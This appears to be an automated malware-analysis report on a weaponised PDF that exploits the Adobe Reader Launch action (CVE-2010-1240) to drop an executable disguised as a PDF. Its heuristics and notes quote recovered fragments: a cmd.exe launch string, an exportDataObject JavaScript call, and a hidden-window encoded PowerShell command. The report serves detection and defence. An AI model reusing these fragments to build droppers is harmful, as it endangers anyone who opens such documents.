Verdict: MALICIOUS
Risk Score: 616

Malware Insights

MITRE ATT&CK:
- T1203 Exploitation for Client Execution
- T1566.001 Spearphishing Attachment
- T1059.007 JavaScript
The PDF file contains JavaScript that leverages a launch action to execute cmd.exe, which in turn attempts to run a payload. This payload is disguised as a PDF file named 'everybodysbookof00raci.pdf' but is detected as a Windows executable by ClamAV. The exploit CVE-2010-1240 is specifically mentioned, indicating a known vulnerability for client execution.
Machine Learning
- Nyx PDF Classifier malicious score 0.9981
Heuristics (15)

- Adobe Reader Launch action command execution [critical, CVE exact] CVE_2010_1240: PDF uses the Adobe Reader/Acrobat Launch action pattern associated with CVE-2010-1240: cmd.exe is invoked with attacker-controlled parameters, paired with an embedded/exported payload.
- JPXDecode + active content (JPEG2000 CVE-family indicator) [high] PDF_JPX_CVE_2018_4990_RELATED: PDF uses /JPXDecode (JPEG2000) alongside JavaScript, XFA, or RichMedia indicators. This matches the delivery pattern for Adobe Reader JPEG2000 parser exploit families, including CVE-2018-4990, but does not prove the exact malformed JP2/JPX primitive.
- Malformed JPEG2000/JP2 box structure [high] PDF_JP2_BOX_ANOMALY: PDF embeds JPEG2000/JP2 data with malformed box sizes. This is a parser-exploit indicator for JPX/JPEG2000 CVE families, not a unique CVE fingerprint.
- ClamAV: Pdf.Tool.Agent-1388586 [critical] CLAMAV_DETECTION: ClamAV detected this file as malware: Pdf.Tool.Agent-1388586.
- Launch action [critical] PDF_LAUNCH: PDF contains a /Launch action whose target is an executable, URL, or UNC path; such an action can start an external application.
- /Launch action target: cmd.exe [critical] PDF_LAUNCH_COMMAND: PDF /Launch action specifies an executable target with parameters '/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\everybodysbookof00raci.pdf" (cd "Desktop"', referencing a known-dangerous executable (cmd, PowerShell, etc.).
- Embedded attachment masquerades: declared document, content is windows-executable [critical] PDF_EMBEDDED_FILESPEC_CONTENT_MISMATCH: An /EmbeddedFile attachment's declared filename extension or /Subtype MIME type contradicts the magic bytes of its decompressed content. The attachment is declared as a benign document or image but the bytes are an executable or executable-bearing archive. This is a deliberate deception used to hide droppers in PDF attachments and is a generic indicator of embed-and-drop weaponisation, independent of any specific CVE.
- /Launch action paired with attachment-dropping JS API [high] PDF_LAUNCH_PLUS_DROPPER_JS: PDF combines a /Launch action with a JavaScript API call that writes or opens an attached/external resource, the canonical shape of the CVE-2010-1240 /Launch + exportDataObject family. Benign PDFs do not pair these surfaces; the combination indicates a drop-and-execute chain regardless of the specific JS API knobs or /Launch target.
- Suspicious extracted artifact [high] EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- JBIG2Decode filter [medium] PDF_JBIG2: JBIG2 image decoder present; historically used in zero-click exploits.
- Unusually high stream count [medium] PDF_MANY_STREAMS: PDF contains 501+ stream objects, which may indicate heap spray or heavy obfuscation.
- JavaScript action [low, 1 related finding] PDF_JAVASCRIPT: PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded JS stream [low] PDF_JS: PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
- Embedded file [low] PDF_EMBEDDED: PDF embeds a file attachment, which could carry an executable or another weaponised document as a nested payload.
- Embedded URL [info] EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. Extracted URL (channel: PDF document text): http://www.archive.org/details/everybodysbookof00raci)/CreationDate(D:20110219041504Z)/Producer(Recoded
Extracted artifacts (32)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 | ClamAV | Obfuscation or payload |
|---|---|---|---|---|---|---|
| everybodysbookof00raci.pdf | pdf-embedded-file | PDF EmbeddedFile object 1016 at offset 0x9E4E80 | 131776 bytes | 4fc3e89f244e7d4d47f61245e214816a460996d6d1a5d2884a582df7d5fcdcdb | Win.Dropper.Paph-9633927-0 | likely (see note 1) |
| javascript_obj1017_000.js | pdf-javascript-stream | PDF /JS object 1017 at offset 0x9EED95 | 71 bytes | fd8cf8ec4e6061476049590df497700f8669a537d25a451ec3d48fa6f48bb0ac | not reported | see note 2 (script preview) |
| jbig2_00_off0000dec4.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xDEC4 | 8342 bytes | ab48b79b22ec737f8b40001f9f59fbd256272e543535c11bfefdbdd9c8f2d179 | No threats found | likely; entropy 7.97 |
| jbig2_01_off00014079.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x14079 | 528 bytes | e88830669850485da0cc044920e65c0a4dfe57254bf4a6e7892f967f4abbd759 | not reported | not reported |
| jbig2_02_off0001c53a.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x1C53A | 14202 bytes | 33230efab9f87b8565ea2bff6058e9927979c8c03dd833a1f6ce1bff42d07b98 | No threats found | likely; entropy 7.98 |
| jbig2_03_off00027274.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x27274 | 13840 bytes | 332d02994c2dbb202e520f16eac17790217b70a6eff01c1e94abcd1ba5d9940f | No threats found | likely; entropy 7.98 |
| jbig2_04_off0003351d.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x3351D | 20205 bytes | 2778dddfd5f17044984441f91556fa3063b06f5d014a98e60ea8122b518feaec | No threats found | likely; entropy 7.99 |
| jbig2_05_off00041907.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x41907 | 18952 bytes | bce7eb3731f0f0a52abde8443281e9f8543ee70798cdfd38b5ca54b00566ac18 | No threats found | likely; entropy 7.99 |
| jbig2_06_off0004e1d2.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x4E1D2 | 13945 bytes | 43f9f704952c26e83bc113a931a704796014139efb624fc5965dd3a5d62bcc85 | No threats found | likely; entropy 7.98 |
| jbig2_07_off00059e9a.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x59E9A | 17913 bytes | 6d4d1a2922db74a5071ac500e6686f6d353b3ba6bc9e1af9f79ff54562b73dad | No threats found | likely; entropy 7.99 |
| jbig2_08_off0006702f.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x6702F | 23659 bytes | e7dbb818ecf77b2c23037a18cd17a92a22026868301ee689d3073b6e7c7fb1dc | No threats found | likely; entropy 7.99 |
| jbig2_09_off00075cf8.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x75CF8 | 25946 bytes | 672f365b09f20edf2fa245742b2559b527fe6cbfc33f9350151d05baa24a103d | No threats found | likely; entropy 7.99 |
| jbig2_10_off00084707.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x84707 | 22282 bytes | 03069626fc31d3df5e6c5e1624c63a6e9503183e9d2154a91007edafc60b9cf0 | No threats found | likely; entropy 7.99 |
| jbig2_11_off00092d9a.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x92D9A | 22122 bytes | b1d233a32180ff97f92b69eb0316c76fef1493cc4ee8277857c702ca0cb52a0f | No threats found | likely; entropy 7.99 |
| jbig2_12_off000a1529.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xA1529 | 22083 bytes | f7627bc34ccb3a056a8c47ab5f96b19cb447005c7705f7488ab7b02e207d3a15 | No threats found | likely; entropy 7.99 |
| jbig2_13_off000afb13.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xAFB13 | 21341 bytes | 9692e5256b1bb35b9ef015aee8480ed31bd74ab2e773914da2acbd2362147894 | No threats found | likely; entropy 7.99 |
| jbig2_14_off000bd43a.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xBD43A | 22411 bytes | 8938602b8c3da91c76378e060d487d1fd43400e90976d8fdaafaca45779e4c3a | No threats found | likely; entropy 7.99 |
| jbig2_15_off000cba33.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xCBA33 | 11222 bytes | ad5f5dca4adcb9378a8b8bdd2cb42caaac18b3670908bc5a2806083da7753612 | No threats found | likely; entropy 7.97 |
| jbig2_16_off000d715d.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xD715D | 20074 bytes | 8d747a2406e191503c39b254148b1d0a84c5ae7746d9c35226ae8b09084b3a6d | No threats found | likely; entropy 7.99 |
| jbig2_17_off000e4b7c.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xE4B7C | 21740 bytes | 7daf60781fab1e50b82282ff8f79596346a0a6c7e90b4eb976e6371cfad9009a | No threats found | likely; entropy 7.99 |
| jbig2_18_off000f3853.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0xF3853 | 23659 bytes | daa0abdde2c7bb62b80e0020cfc17be8fc90b9da8f5bd22be597a1ee8f4b1988 | No threats found | likely; entropy 7.99 |
| jbig2_19_off00101fd7.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x101FD7 | 19294 bytes | 4ef3ec967ef4914862ccfc9fb7c91b1cc177c6f80d09944429af2eabee9c6f59 | No threats found | likely; entropy 7.99 |
| jbig2_20_off0010fb8c.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x10FB8C | 20826 bytes | 1ae4f1d7ffd74e62b6304bf6c5fc315b80d6d6bb1279fddc8676e013520e2636 | No threats found | likely; entropy 7.99 |
| jbig2_21_off0011d959.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x11D959 | 17431 bytes | 54281c1f7c02de83f8f3a7112f8cc785da9ba228fa1c1114fbad0e3337215343 | No threats found | likely; entropy 7.99 |
| jbig2_22_off0012a443.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x12A443 | 15205 bytes | fec7ee4466bc715f2ee27547439971fb28a8432a864c91fa48d6e2b3b5caa9fb | No threats found | likely; entropy 7.98 |
| jbig2_23_off00136b39.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x136B39 | 22429 bytes | 7edf00ad3d5bd43504cfabc7eb8b5cd4c9e2a48189960a442b9e9788521343b8 | No threats found | likely; entropy 7.99 |
| jbig2_24_off00146730.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x146730 | 11157 bytes | 06c87cbdd9b3237f7775d0340342f54c3b363e10a7ec95063fd0ef9d308c32ae | No threats found | likely; entropy 7.97 |
| jbig2_25_off00152567.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x152567 | 20893 bytes | 9f572b6df12f8be7b1b704627a093f9441fd8d3b957a15dfd52a2a39ed9dba6f | No threats found | likely; entropy 7.99 |
| jbig2_26_off00160225.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x160225 | 17919 bytes | 6809f4cc7efc26d91e2289ad7660ee4459f77b9fd2f4112b575cf1bd93147cc7 | No threats found | likely; entropy 7.98 |
| jbig2_27_off0016cc7c.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x16CC7C | 20145 bytes | 6583837255b5592b3b2abbc3094fdbbbfbc1b044632ec11c3bbd11c18ce6e8c6 | No threats found | likely; entropy 7.99 |
| jbig2_28_off0017ac58.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x17AC58 | 18366 bytes | 48c349f852b1c80e59533c2671b025e1ee241215c65291300a01588fff510e00 | No threats found | likely; entropy 7.99 |
| jbig2_29_off00187fa2.bin | pdf-jbig2-stream | PDF JBIG2 stream at offset 0x187FA2 | 21712 bytes | 8ad4ceba32361d914af960e30cf23e86413eedee21051be9afeb48dfb91e23e9 | No threats found | likely; entropy 7.99 |

For every JBIG2 stream marked "likely", the carved artifact's entropy (7.97 to 7.99) is consistent with packed or encrypted content.

Notes:

1. everybodysbookof00raci.pdf: actual_type=PE; declared_or_context_type=PDF; filename=everybodysbookof00raci.pdf; kind=pdf-embedded-file. Static shellcode analysis recovered command string(s): `powershell -window hidden -EncodedCommand JAB5AHIAcABKACAAPQAgACcAJABKAHoANAAgAD0AIAAnACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIA`. Carved artifact contains a PowerShell -EncodedCommand style payload.
2. javascript_obj1017_000.js, script preview (first 1,000 lines of the extracted script): `this.exportDataObject({ cName: "everybodysbookof00raci", nLaunch: 0 });`